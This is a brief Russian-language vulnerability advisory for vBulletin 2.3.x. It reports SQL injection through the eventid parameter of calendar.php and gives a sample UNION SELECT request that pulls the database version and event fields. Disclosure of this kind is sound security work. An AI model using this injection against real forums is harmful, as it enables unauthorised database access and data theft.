Программа: vBulletin 2.3.х
Удаленный пользователь может внедрить произвольные SQL команды.
Уязвимость обнаружена в параметре eventid в сценарии
calendar.php.
Пример (добавляет событие (#14)):
calendar.php?s=&action=edit&eventid=14 union (SELECT
allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events WHERE eventid = 14) order by eventdate
